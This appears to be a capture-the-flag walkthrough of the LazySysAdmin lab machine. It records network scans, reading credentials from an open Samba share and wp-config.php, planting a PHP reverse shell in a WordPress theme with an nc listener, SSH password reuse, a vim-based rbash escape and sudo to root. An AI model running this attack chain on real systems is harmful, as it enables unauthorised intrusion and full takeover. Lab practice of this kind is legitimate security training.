$fping -a -g 192.168.1.0/24

ip is 192.168.1.8




$ nmap -sV 192.168.1.8 -p- -T5 -Pn


PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel


$ nmap -A 192.168.1.8 -p- -T5 -Pn 

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.1.6
|_  error: Closing link: (nmap@192.168.1.6) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3h17m55s, deviation: 5h46m24s, median: 2m03s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2020-04-24T22:17:30+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-24T12:17:30
|_  start_date: N/A





#server administrator is webmaster@localhost
#LazySysAdmin is hostname



$ dirb http://192.168.1.8/

this gave us lots of good stuf

importants are wordpress and phpmyadmin directories


wpscan --url http://192.168.1.9/wordpress/ -U usernames.txt -P passwords.txt


I did brute force the wp-admin login page but It did not work.


lets look at the samba service

https://medium.com/@nmappn/exploiting-smb-samba-without-metasploit-series-1-b34291bbfd63
there is a good article on this page about samba

# smbclient -L //192.168.1.8/



print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAZYSYSADMIN


lets look at the share$ file

$ smbclient //192.168.1.8/share$

smb: \> ls

b: \> ls
  .                                   D        0  Tue Aug 15 14:05:52 2017
  ..                                  D        0  Mon Aug 14 15:34:47 2017
  wordpress                           D        0  Fri Apr 24 15:23:56 2020
  Backnode_files                      D        0  Mon Aug 14 15:08:26 2017
  wp                                  D        0  Tue Aug 15 13:51:23 2017
  deets.txt                           N      139  Mon Aug 14 15:20:05 2017
  robots.txt                          N       92  Mon Aug 14 15:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 15:39:56 2017
  apache                              D        0  Mon Aug 14 15:35:19 2017
  index.html                          N    36072  Sun Aug  6 08:02:15 2017
  info.php                            N       20  Tue Aug 15 13:55:19 2017
  test                                D        0  Mon Aug 14 15:35:10 2017
  old                                 D        0  Mon Aug 14 15:35:13 2017
  
 
 
 $ more deets.txt
 
 CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345


lets read wp-config content

more wordpress/wp-config.php


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');




we see the password of the database


lets go to http://192.168.1.8/wordpress/wp-login and use these credentials to login to the 
wordpress

we are in wordpress now


now we will get a reverse shell by installing a phph reverse shell into a wordpress
theme 

now go to themes > Editor > twentyfifteen>404.php

and paste php reverse shell 
now set a nc listener on the local machine

nc -lnvp 1234

and go to http://lazysysadmin/wordpress/wp-content/themes/twentyfifteen/404.php

and we got the reverse shell


$whoami
 www-data
 
 
$cat /etc/passwd

togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash

there is a use togie

$cd /var/www/html

$ ls


drwxr-xr-x 2 www-data root     4096 Aug 14  2017 Backnode_files
drwxr-xr-x 2 www-data root     4096 Aug 14  2017 apache
-rw-r--r-- 1 www-data root      139 Aug 14  2017 deets.txt
-rw-r--r-- 1 www-data root    36072 Aug  6  2017 index.html
-rw-r--r-- 1 www-data root       20 Aug 15  2017 info.php
drwxr-xr-x 2 www-data root     4096 Aug 14  2017 old
-rw-r--r-- 1 www-data root       92 Aug 14  2017 robots.txt
drwxr-xr-x 2 www-data root     4096 Aug 14  2017 test
-rw-r--r-- 1 www-data root       79 Aug 14  2017 todolist.txt
drwxr-xr-x 5 www-data nogroup  4096 Apr 24 22:23 wordpress
drwxr-xr-x 2 www-data root     4096 Aug 15  2017 wp


when I read the deets.txt file I saw 

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345


and I thought maybe user togie's password is 12345

and I did ssh to the machine

$ ssh -l togie 192.168.1.8
and use password 12345

and we are in

 
now the shell that togie is using is a restricted shell

lets escape out of this 

we will use vim to escape out of the rbash

$vim /etc/passwd

:set shell=/bin/bash
:shell

now we can use cd command

$ sudo -l


[sudo] password for togie: 
Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL

$ sudo su

$whoami 

root






